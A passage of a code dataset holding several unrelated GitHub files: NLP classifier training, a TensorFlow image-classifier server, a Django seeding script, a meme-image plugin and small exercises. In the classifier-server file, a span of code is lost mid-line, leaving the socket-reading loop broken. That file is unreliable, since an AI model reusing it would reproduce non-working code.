None:\n rs2 = random.randint(0, MAX_INT)\n config['random_states'] = [rs1, rs2]\n train_dev_data, test_data = train_test_split(\n self.data,\n test_size=test_size, shuffle=True, stratify=self.data['label'],\n random_state=rs1,\n )\n train_data, dev_data = train_test_split(\n train_dev_data,\n test_size=dev_size, shuffle=True, stratify=train_dev_data['label'],\n random_state=rs2,\n )\n return train_data, dev_data, test_data\n\n def default_model(self, config):\n config['output_dim'] = self.data['label'].nunique()\n model = SentenceClassifier(**config)\n model.to(self.device)\n return model\n\n def default_optimizer(self, config):\n params = [{'params': self.model.sentence_embedder.parameters()},\n {'params': self.model.projection_layer.parameters(), 'lr': config['learning_rate_top']}]\n return init_obj(config['type'], _default_module_optim, params, lr=config['learning_rate'])\n\n def default_criterion(self):\n labels = self.data['label'].cat.codes\n label_counts = np.bincount(labels)\n label_weights = len(labels) / (len(label_counts) * label_counts)\n label_weights = torch.tensor(label_weights, dtype=torch.float, device=self.device)\n criterion = nn.CrossEntropyLoss(weight=label_weights)\n return criterion\n\n def default_trainer(self):\n return Trainer(\n model=self.model,\n optimizer=self.optimizer,\n criterion=self.criterion,\n metric=self.metric,\n config=self.config,\n device=self.device,\n )\n\n def resume(self, path):\n logger.info('Load checkpoint from: {}'.format(path))\n self.trainer.load_checkpoint(path)\n\n def train(self):\n self.trainer.train(\n self.train_data_loader,\n self.dev_data_loader,\n **self.config['trainer'],\n )\n\n def eval(self):\n self.trainer.eval(\n self.dev_data_loader,\n verbose=self.config['trainer']['verbose'],\n )\n\n def test(self):\n self.trainer.eval(\n self.test_data_loader,\n verbose=self.config['trainer']['verbose'],\n )\n","repo_name":"bichngocdo/sentence-classification","sub_path":"sentclf/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35735126148","text":"N, M, A, B = map(int, input().split())\n\nbool = [False] * N\n\nfor _ in range(M):\n a, b = map(int, input().split())\n for i in range(a-1, b):\n if not bool[i]:\n bool[i] = not bool[i]\n\na = bool.count(True)\n\nprint(a*A+(N-a)*B)","repo_name":"haytok/AtCoder","sub_path":"Company/2018/CODEFESTIVAL2018/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45224262366","text":"import glob\nimport os\nimport tensorflow as tf\nimport numpy as np\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport time\nimport io\nimport socket\nimport struct\nfrom PIL import Image\nimport base64\nimport traceback\nfrom time import sleep\nimport netifaces as ni\nni.ifaddresses('wlan0')\nip = ni.ifaddresses('wlan0')[2][0]['addr']\n#print(\"listening at \"+ip.strip()+\":8000\")\nsess= tf.Session()\nlabel_lines = []\nsoftmax_tensor = None\nserver = SimpleXMLRPCServer(('192.168.43.12', 9009),allow_none=True)\n\n# Start a socket listening for connections on 0.0.0.0:8000 (0.0.0.0 means\n# all interfaces)\ndef load_ai_server():\n #print(\"load_ai_server ....\")\n load_start_time = time.time()\n server_socket = socket.socket()\n server_socket.bind(('192.168.43.12', 8000))\n server_socket.listen(0)\n #print(\"load_ai_server done\")\n # socket connection live at ....1.4 @ port 8000\n # accept socket connection and listen to pakcet daata\n # Accept a single connection and make a file-like object out of it\n connection = server_socket.accept()[0].makefile('rb')\n imageList = []\n try:\n while True:\n #print(\"waiting for hit from picamclient....\")\n # Read the length of the image as a 32-bit unsigned int. If the\n # length is zero, quit the loop\n image_len = struct.unpack('> \",str(( time.time() - load_start_time)))\n del imageList[:]\n #print(\"after processing list size>>> \",len(imageList))\n break\n # Construct a stream to hold the image data and read the image\n # data from the connection\n image_stream = io.BytesIO()\n image_stream.write(connection.read(image_len))\n # image_path.write(connection.read(image_len))\n # Rewind the stream, open it as an image with PIL and do some\n # processing on it\n image_stream.seek(0)\n image = Image.open(image_stream)\n imageList.append(image)\n \n except Exception as e:\n \tprint(\"Exception >> \",e)\n finally:\n connection.close()\n server_socket.close()\ndef close_stream_server():\n connection.close()\n server_socket.close()\n\ndef load_ai_engine():# MAJOR PERFORMANCE BOOST- does persist tf session so that session is not loaded on-demand\n\tprint(\"loading AI engine...\")\n\tglobal label_lines\n\tlabel_lines = [line.rstrip() for line in tf.gfile.GFile(\"/home/airig/python-scripts/birdfeeder/labels.txt\")]\n\twith tf.gfile.FastGFile(\"/home/airig/python-scripts/birdfeeder/retrained_graph_birdfeeder.pb\", 'rb') as f:#retrain_lastlayer/output_graph.pb\n\t graph_def = tf.GraphDef()\n\t graph_def.ParseFromString(f.read())\n\t _ = tf.import_graph_def(graph_def, name='')\n\tglobal sess\n\twith tf.Session() as sess:\n\t\tglobal softmax_tensor\n\t\tsoftmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n\t\tprint(\"AI engine loaded\")\n\t\t#return sess,label_lines,softmax_tensor\ndef process_ai_engine(imageList):#(sess,label_lines,softmax_tensor):\n\tprint('Inside AI Engine....READING Image>>>>> ')\n\tstart_time = time.time()\n\tdetected_obj_list=[]\n\tfor image in imageList:\n\t\ttry:\n\t\t\timage_array = np.array(image)[:,:,0:3]\n\t\t\tpredictions = sess.run(softmax_tensor, {'DecodeJpeg:0': image_array})\n\t\texcept Exception:\n\t\t\tprint(\"error in running tf session >> \", str(traceback.print_exc()))\n\t\ttop_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\t\thuman_string = label_lines[top_k[0]]\n\t\tscore = predictions[0][top_k[0]]\n\t\tif(score>0.5):# 50% accuracy is VERY LINIENT!! this value needs to be adjusted as per trained model accuracy\n\t\t\tdetected_obj_list.append(human_string)\n\t\telse:\n\t\t\tpass#print(\"score less then 0.5 for\",human_string)\n\ttry:\n\t\thuman_string = max(set(detected_obj_list), key=detected_obj_list.count)\n\texcept Exception as e:\n\t\thuman_string= \"UNKNOWN\"\n\t\t#confidence= \"UNKNOWN\"\n\t\tprint(\"Not sure. Retry.\")\n\treturn human_string#\"Outcome >> \"+human_string+\">>(INFERENCE TIME:)\"+str(( time.time() - start_time))#+\">>(Confidence:)\"+str(score*100)+\n\t\ntry:\n\t#print(\"with try\")\n\tserver.register_function( load_ai_engine )\n\tserver.register_function( load_ai_server )\n\tserver.register_introspection_functions()\n\tprint(\"listening at \"+ip+\":9009 ................. \")\n\tserver.serve_forever()\nexcept(Exception,KeyboardInterrupt, SystemExit) as e:\n\tprint(\"\\nGPU module shutdown successfuly\\n\",str(e))\n\n","repo_name":"anuj2rock/fair-fed","sub_path":"classifier_server.py","file_name":"classifier_server.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42826003715","text":"\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure?\\nEnter Row then coloumn: \")\n\n\n\n\n# print(type(position)) users input is in str need to change to int\n\nhori = position[0] \nvert = position[1] \nhori_int = int(hori) - 1\nvert_int = int(vert) - 1\n\nmap[hori_int][vert_int] =\"X\"\n\n\n\n\n\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")","repo_name":"MusarrafAM/Python-beginner-programs","sub_path":"10. Treassure map(X).py","file_name":"10. Treassure map(X).py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17784045990","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Task: 문서를 보고 category2를 예측\n\n# **학습 데이터에 대한 통계정보 시각화**\n\n# # **전체를 한번에 보고 바로 소분류 예측**\n\n# In[2]:\n\n\nget_ipython().system('pip install transformers')\nget_ipython().system('pip install pandas')\nget_ipython().system('pip install numpy')\nget_ipython().system('pip install tqdm')\nget_ipython().system('pip install scikit-learn')\n\n\n# In[3]:\n\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport random\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn.functional as F\nfrom sklearn.model_selection import train_test_split\nfrom transformers import TrainingArguments, Trainer\nfrom transformers import AutoModelForSequenceClassification, AutoTokenizer\n\nfrom transformers import BertTokenizer\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\n\n# In[4]:\n\n\ndef seed_everything(seed:int = 1004):\n random.seed(seed)\n np.random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed) # type: ignore\n torch.backends.cudnn.deterministic = True # type: ignore\n torch.backends.cudnn.benchmark = True # type: ignore\n\nseed_everything(42)\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\n# In[5]:\n\n\ntrain_path = \"train.csv\"\ntest_path = \"test.csv\"\nsubmission_path = \"\"\n\n\n# In[6]:\n\n\ndf = pd.read_csv(train_path, encoding='utf-8')\n\nfor cate1 in df['category1'].unique():\n condition = df['category1'] == cate1\n words = set()\n tokenized_words = set()\n# print(condition)\n# for sent in df[condition]['text'].values:\n# tokenized_words.update(word_tokenize(sent)) \n# words.update(sent.split(\" \"))\n# print(f\"{cate1}의 토크나이즈 전: {len(words)} -> 토크나이즈 후: {len(tokenized_words)}\")\n\nlabels_dictionary = {k: v for k,v in zip(df['category2'].unique(), range(0,len(df['category2'].unique())))}\nlabels_dictionary_reverse = {v: k for k,v in zip(df['category2'].unique(), range(0,len(df['category2'].unique())))}\n\n\n# # DistilBERT\n# - DistilBERT is a transformers model, smaller and faster than BERT, which was pretrained on the same corpus in a self-supervised fashion, using the BERT base model as a teacher.\n# - BERT 시도 후, DistilBERT 모델로 성능 향상 후 최종 제출하였음.\n# \n# # 참고자료 출처\n# - huggingface trainer 사용법 : https://huggingface.co/docs/transformers/training#train\n# - koBERT를 활용한 한국어 데이터 문장 관계 Baseline : https://dacon.io/competitions/official/235875/codeshare/4520\n\n# In[7]:\n\n\nMODEL_NAME = 'distilbert-base-uncased'\n\ntokenizer = BertTokenizer.from_pretrained(MODEL_NAME)\n\nprint(len(df['category2'].unique()))\n\nmodel = AutoModelForSequenceClassification.from_pretrained(MODEL_NAME,\n num_labels=len(df['category2'].unique()),\n label2id=labels_dictionary,\n id2label=labels_dictionary_reverse)\n\n\n# In[1]:\n\n\nX = df['text']\ny = df['category2']\nclass_weights = (1 - (y.value_counts().sort_index() / len(df))).values\nclass_weights = torch.from_numpy(class_weights).float().to(device)\nclass_weights # Imbalanced classes 조정\n\n\n# In[8]:\n\n\nX_train, X_valid = train_test_split(df, test_size=0.2, shuffle=True)\n\ntokenized_train = tokenizer(\n list(X_train.text),\n return_tensors=\"pt\",\n max_length=256,\n padding=True,\n truncation=True,\n add_special_tokens=True\n)\n\ntokenized_eval = tokenizer(\n list(X_valid.text),\n return_tensors=\"pt\",\n max_length=256,\n padding=True,\n truncation=True,\n add_special_tokens=True\n)\n\nprint(tokenized_train['input_ids'][0])\nprint(tokenizer.decode(tokenized_train['input_ids'][0]))\n\n\n# In[9]:\n\n\nclass BERTDataset(torch.utils.data.Dataset):\n def __init__(self, pair_dataset, label):\n self.pair_dataset = pair_dataset\n self.label = label\n\n def __getitem__(self, idx):\n item = {key: val[idx].clone().detach() for key, val in self.pair_dataset.items()}\n item['label'] = torch.tensor(self.label[idx])\n \n return item\n\n def __len__(self):\n return len(self.label)\n \ndef label_to_num(label):\n label_dict = labels_dictionary\n num_label = []\n\n for v in label:\n num_label.append(label_dict[v])\n \n return num_label\n\ntrain_label = label_to_num(X_train['category2'].values)\neval_label = label_to_num(X_valid['category2'].values)\n\n\n# In[10]:\n\n\ntrain_dataset = BERTDataset(tokenized_train, train_label)\neval_dataset = BERTDataset(tokenized_eval, eval_label)\n\nprint(train_dataset.__len__())\nprint(train_dataset.__getitem__(0))\nprint(tokenizer.decode(train_dataset.__getitem__(0)['input_ids']))\nprint(train_dataset.__getitem__(0)['label'])\nprint(tokenizer.decode(train_dataset.__getitem__(0)['label']))\n\n\n# In[11]:\n\n\nfrom torch import nn\nimport torch\n\nclass CustomTrainer(Trainer):\n def compute_loss(self, model, inputs, return_outputs=False):\n outputs = model(**inputs)\n logits = outputs.get(\"logits\")\n labels = inputs.get(\"labels\")\n loss_func = nn.CrossEntropyLoss(weight=class_weights)\n loss = loss_func(logits, labels)\n return (loss, outputs) if return_outputs else loss\n\n\n# In[12]:\n\n\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support, roc_auc_score\n\ndef compute_metrics(pred):\n labels = pred.label_ids\n preds = pred.predictions.argmax(-1)\n precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='weighted')\n return {\n 'f1': f1\n }\n\n\n# In[13]:\n\n\ntraining_args = TrainingArguments(\n output_dir='./result',\n num_train_epochs=10,\n learning_rate=2e-5,\n per_device_train_batch_size=32,\n per_device_eval_batch_size=32,\n warmup_steps=100,\n weight_decay=0.01,\n save_total_limit=5,\n optim=\"adamw_torch\",\n save_steps=100,\n evaluation_strategy='steps',\n eval_steps=100,\n logging_steps=64,\n load_best_model_at_end = True,\n fp16=True # 좀 더 빠른 train이 된다??\n)\n\ntrainer = CustomTrainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n)\n\ntrainer.train()\nmodel.save_pretrained('./result/best_model')\n\n\n# In[14]:\n\n\ndf_test = pd.read_csv(test_path, encoding='utf-8')\ndf_test\n\n\n# In[16]:\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nTokenizer_NAME = \"bert-base-uncased\"\ntokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)\n\nMODEL_NAME = './result/checkpoint-4700'\nmodel = AutoModelForSequenceClassification.from_pretrained(\n MODEL_NAME,\n num_labels=len(df['category2'].unique()),\n label2id=labels_dictionary,\n id2label=labels_dictionary_reverse,\n)\n\n\n# In[17]:\n\n\ntrainer.evaluate()\n\n\n# In[18]:\n\n\ndf_test = pd.read_csv(test_path, encoding='utf-8')\ndf_test\n\n\n# In[19]:\n\n\nimport torch, gc\ngc.collect()\ntorch.cuda.empty_cache()\n\noutput_pred = []\noutput_prob = []\nmodel.eval()\ntxt_test = [tokenizer(_, return_tensors=\"pt\", max_length=256, truncation=True, padding=True) for _ in list(df_test['text'])]\nlogits_list = []\nfor i in tqdm(txt_test):\n with torch.no_grad():\n outputs = model(**i).logits\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n result = np.argmax(logits, axis=-1)\n\n output_pred.append(result)\n output_prob.append(prob)\n\n\n# In[ ]:\n\n\nanswers = []\nfor i in output_pred:\n answers.append(labels_dictionary_reverse[i])\nanswers\n\n\n# In[ ]:\n\n\ndf_test['category2'] = answers\ndf_test\n\n\n# In[ ]:\n\n\ndf_test.to_csv(submission_path+'submission_11.csv', index=False, columns=['id', 'category2'])\n\n","repo_name":"NewPlus/2022JBNUBigDataContest","sub_path":"problem1_distillBert.py","file_name":"problem1_distillBert.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18283850497","text":"import itertools\nimport os, django, decimal\nimport random\n\nfrom django.utils import timezone\nfrom django.db.utils import IntegrityError\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"electronic_shop.settings\")\ndjango.setup()\n\nfrom django.db.models.functions.text import Ord\n\nfrom ProductApp.products import (\n phones,\n monitors,\n laptops,\n pcs,\n accesories,\n ssds,\n graphs,\n rams,\n pendrives,\n switches,\n motherboards,\n cpus,\n tvs,\n headphones,\n routers,\n)\nfrom django.core.files import File\nfrom ProductApp.models import *\nfrom ProductApp.products import *\nfrom Articles.models import ArticleComment\nfrom ShoppingCardApp.models import *\n\n\nproducts = [\n phones,\n monitors,\n laptops,\n pcs,\n accesories,\n ssds,\n graphs,\n rams,\n pendrives,\n switches,\n motherboards,\n cpus,\n tvs,\n headphones,\n routers,\n]\nfolders = [\n \"phones\",\n \"monitors\",\n \"laptops\",\n \"pcs\",\n \"accesories\",\n \"ssds\",\n \"graphs\",\n \"rams\",\n \"pendrives\",\n \"switches\",\n \"motherboards\",\n \"cpus\",\n \"tvs\",\n \"headphones\",\n \"routers\",\n]\n\n\nmodel = {\n \"phones\": lambda **item: Phones.objects.get_or_create(**item),\n \"monitors\": lambda **item: Monitors.objects.get_or_create(**item),\n \"laptops\": lambda **item: Laptops.objects.get_or_create(**item),\n \"pcs\": lambda **item: Pc.objects.get_or_create(**item),\n \"accesories\": lambda **item: AccesoriesForLaptops.objects.get_or_create(**item),\n \"ssds\": lambda **item: Ssd.objects.get_or_create(**item),\n \"graphs\": lambda **item: Graphs.objects.get_or_create(**item),\n \"rams\": lambda **item: Ram.objects.get_or_create(**item),\n \"pendrives\": lambda **item: Pendrives.objects.get_or_create(**item),\n \"switches\": lambda **item: Switches.objects.get_or_create(**item),\n \"motherboards\": lambda **item: Motherboard.objects.get_or_create(**item),\n \"cpus\": lambda **item: Cpu.objects.get_or_create(**item),\n \"tvs\": lambda **item: Tv.objects.get_or_create(**item),\n \"headphones\": lambda **item: Headphones.objects.get_or_create(**item),\n \"routers\": lambda **item: Routers.objects.get_or_create(**item),\n}\n\n\n\"\"\" Add products to daabase \"\"\"\n\nfor prod, folder in zip(products, folders):\n for product, fold in zip(prod, itertools.repeat(folder)):\n PATH = rf\"electronic_shop/static/images/products/{fold}/\"\n try:\n itt, _ = model[fold](**product)\n except IntegrityError:\n pass\n\n try:\n itt.main_photo.save(\n product[\"main_photo\"], File(open(PATH + product[\"main_photo\"], \"rb\"))\n )\n except:\n pass\n\n try:\n itt.second_photo.save(\n product[\"second_photo\"],\n File(open(PATH + product[\"second_photo\"], \"rb\")),\n )\n except:\n pass\n try:\n itt.third_photo.save(\n product[\"third_photo\"], File(open(PATH + product[\"third_photo\"], \"rb\"))\n )\n except:\n pass\n print(f'Product {product[\"name\"]} created')\n\n\"\"\" Choose random products and change \"product of the day\" field. Adding promotion \"\"\"\nproducts = list(MainProductDatabase.objects.all())\n\n# Reset field\nfor product in products:\n product.selected = False\n product.save()\n\nselected = [products[random.randint(0, len(products) - 1)] for _ in range(0, 8)]\n\n# Add selected and change price\nfor product in selected:\n product.selected = True\n product.promotion = product.price * round(decimal.Decimal(0.7), 2)\n product.save()\n\n\n\"\"\" Choose one product as a product of the day \"\"\"\nproduct_of_the_day = products[random.randint(0, len(products) - 1)]\n\nproduct_of_the_day.promotion = product_of_the_day.price * round(decimal.Decimal(0.6), 2)\nproduct_of_the_day.product_of_the_day = True\nproduct_of_the_day.product_of_the_day_added = timezone.now()\nproduct_of_the_day.save()\n\n\n\"\"\" Add 3 blog posts \"\"\"\n\nfrom Articles.models import LandingPageArticles\nfrom django.contrib.auth import get_user_model\n\n\nuser, created = get_user_model().objects.get_or_create(email=\"employee@account.com\")\n\nif created:\n user.set_password(\"employee\")\n user.save()\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"Phones\",\n tag_two=\"Laptops\",\n tag_three=\"Smartphones\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"dqwd.png\",\n File(open(r\"electronic_shop/static/images/showcase/low res/dqwd.png\", \"rb\")),\n)\n\n\"\"\"Comment section\"\"\"\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Gdzie jest slonko kiedy spi?\",\n email=\"test@gmail.com\",\n name=\"Test Testowy\",\n checked=True,\n)\n\nfirst_comment_answer = ArticleComment.objects.create(\n article=article,\n comment=\"Dokąd w nocy tupta jeż?\",\n email=\"test@gmail.com\",\n name=\"Test Testowy\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Avada Kedavra\",\n email=\"test@gmail.com\",\n name=\"Voldemort\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Auuuu\",\n email=\"test@gmail.com\",\n name=\"101 Dalmatians\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Stay in wonderland\",\n email=\"test@gmail.com\",\n name=\"Morfeusz\",\n checked=True,\n parent=first_comment_answer,\n)\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"TV\",\n tag_two=\"SSD\",\n tag_three=\"Pendrives\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"koparka.jpg\",\n File(open(r\"electronic_shop/static/images/showcase/low res/koparka.jpg\", \"rb\")),\n)\n\n\n\"\"\"Comment section\"\"\"\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n email=\"test@gmail.com\",\n name=\"Where does it come from?\",\n checked=True,\n)\n\nfirst_comment_answer = ArticleComment.objects.create(\n article=article,\n comment=\"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\",\n email=\"test@gmail.com\",\n name=\"H. Rackham\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras quam velit, ultrices eget consequat at, molestie ut diam. Nunc ultricies massa eget nunc dapibus congue. In molestie orci at risus rutrum, vel scelerisque sapien malesuada. Aliquam vitae ullamcorper elit, et consequat nisi. Cras sed pharetra dui, eget blandit odio. Etiam in commodo lacus. In congue nisi mauris, eu hendrerit elit auctor sit amet. Donec tincidunt tellus ac neque iaculis, sed interdum dui gravida.\",\n email=\"test@gmail.com\",\n name=\"Lorem Ipsum\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Pellentesque vitae lobortis quam, eu lobortis enim. Donec eget nisl lacinia, dapibus libero id, bibendum tellus. Quisque gravida dolor et purus elementum tempus.\",\n email=\"test@gmail.com\",\n name=\"Neque porro quisquam \",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Aliquam maximus tincidunt magna, vitae luctus tortor finibus eu. Sed ac massa turpis. Aliquam tristique sit amet dolor sed facilisis. Suspendisse commodo nunc sit amet scelerisque porta\",\n email=\"test@gmail.com\",\n name=\"Ut est justo\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Vivamus quis maximus diam, at pulvinar mauris. Aliquam ante orci, ornare eget elit maximus, commodo hendrerit nulla. Maecenas faucibus nisi sapien, vel maximus turpis luctus a.\",\n email=\"test@gmail.com\",\n name=\"Aliquam ante orci\",\n checked=True,\n)\n\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"TV\",\n tag_two=\"PC\",\n tag_three=\"Pendrives\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"pc2.jpg\",\n File(open(r\"electronic_shop/static/images/showcase/low res/pc2.jpg\", \"rb\")),\n)\n\n\n\"\"\" buy some products for employee account \"\"\"\n\n\ncustomer, created = Customer.objects.get_or_create(user=user)\n\nfor _ in range(1, 10):\n\n order = Order.objects.create(\n customer=customer,\n transaction_id=\"\",\n transaction_status=True,\n transaction_finished=timezone.now(),\n )\n\n for _ in range(1, 5):\n product_item = products[random.randint(0, len(products) - 1)]\n\n order_item = OrderItem.objects.create(\n order=order, quantity=random.randint(1, 10), product=product_item\n )\n\n try:\n review, created = Reviews.objects.get_or_create(\n product=order_item.product,\n review=\"Vivamus quis maximus diam, at pulvinar mauris. Aliquam ante orci, ornare eget elit maximus, commodo hendrerit nulla. Maecenas faucibus nisi sapien, vel maximus turpis luctus a.\",\n user=user,\n stars=random.randint(1, 6),\n checked_by_employer=True,\n )\n except IntegrityError:\n pass\n\n if created:\n review = created\n\n question = (\n Questions.objects.create(\n product=order_item.product,\n question=\"Gdzie jest słońce kiedy spi?\",\n name=\"Janko Muzykant\",\n checked_by_employer=True,\n employer_reply=\"A dokąd w nocy tupta jeż?\",\n ),\n )\n\n question = Questions.objects.create(\n product=order_item.product,\n question=\"Mr. Anderson, welcome back, we miss you\",\n name=\"Smith\",\n checked_by_employer=True,\n employer_reply=\"Im leaving right now.\",\n )\n\n\"\"\" create likes \"\"\"\n\nfor _ in range(1, 50):\n product_like = products[random.randint(0, len(products) - 1)].likes\n product_like.add(user)\n","repo_name":"LukaszRemkowicz/Electronic_Shop_Project","sub_path":"products_script.py","file_name":"products_script.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33321168478","text":"from argparse import Namespace\nfrom pathlib import Path\nfrom typing import List\n\nfrom nonebot.adapters.onebot.v11 import Bot, MessageEvent, MessageSegment\nfrom nonebot.params import ShellCommandArgs\nfrom nonebot.rule import ArgumentParser\nfrom PIL import Image, ImageEnhance, ImageFilter\n\nfrom util import command, imutil, misc, textutil\nfrom util.user_aliases import AvatarGetter, DefaultType\n\nDIR = Path(__file__).resolve().parent\n\n\nparser = ArgumentParser(add_help=False)\nparser.add_argument(\"target\", nargs=\"?\", default=\"\", metavar=\"目标\", help=(\n \"可使用@、QQ号、昵称、群名片或图片链接(可传入动图)\"\n))\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\n \"--webp\", \"-w\", action=\"store_const\", dest=\"format\", const=\"webp\", default=\"gif\",\n help=\"使用WebP而非GIF格式(如果传入动图)\"\n)\ngroup.add_argument(\n \"--png\", \"--apng\", \"-p\", action=\"store_const\", dest=\"format\", const=\"png\",\n help=\"使用APNG而非GIF格式(如果传入动图)\"\n)\nmatcher = (\n command.CommandBuilder(\"meme_pic.loading\", \"加载中\")\n .category(\"meme_pic\")\n .brief(\"[动]\")\n .shell(parser)\n .build()\n)\n@matcher.handle()\nasync def handler(bot: Bot, event: MessageEvent, args: Namespace = ShellCommandArgs()) -> None:\n async with AvatarGetter(bot, event) as g:\n target_task = g(args.target, DefaultType.TARGET, raw=True)\n\n def make() -> MessageSegment:\n target, _ = target_task.result()\n big = imutil.resize_width(target.convert(\"RGBA\"), 500)\n mask = Image.new(\"RGB\", big.size, (255, 255, 255))\n mask.paste(big, mask=big)\n mask = ImageEnhance.Brightness(mask).enhance(0.5)\n mask = mask.filter(ImageFilter.GaussianBlur(3))\n icon = Image.open(DIR / \"icon.png\")\n imutil.paste(mask, icon, (big.width // 2, big.height // 2), anchor=\"mm\")\n text1 = textutil.render(\"不出来\", \"sans\", 60)\n\n frames: List[Image.Image] = []\n for raw in imutil.frames(target):\n small = imutil.resize_width(raw.convert(\"RGBA\"), 100)\n text_h = max(small.height, text1.height)\n im = Image.new(\"RGB\", (big.width, big.height + text_h), (255, 255, 255))\n im.paste(mask)\n x = (im.width - small.width - text1.width) // 2\n y = big.height + text_h // 2\n im.paste(small, (x, y - small.height // 2), small)\n x += small.width\n im.paste(text1, (x, y - text1.height // 2), text1)\n frames.append(im)\n\n return imutil.to_segment(frames, target, afmt=args.format)\n\n await matcher.finish(await misc.to_thread(make))\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/meme_pic/loading/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"12323509990","text":"import matplotlib.pyplot as plt\nimport librosa.display\n\nAUDIO_PATH = 'music/2019CDSF总决赛A组拉丁舞决赛斗牛现场用曲.mp3'\nmusic, sr = librosa.load(AUDIO_PATH)\n\nplt.figure(figsize=(14, 5))\nlibrosa.display.waveplot(music, sr=sr)\n\nplt.show()","repo_name":"vvright/LearningPython","sub_path":"dancesport/paso_plt.py","file_name":"paso_plt.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29271045300","text":"import pytest\nimport os\nimport shutil\nimport time\nimport asyncer\nimport asyncio\nimport anyio\n\n\n@pytest.fixture\ndef anyio_backend():\n \"\"\"event loop 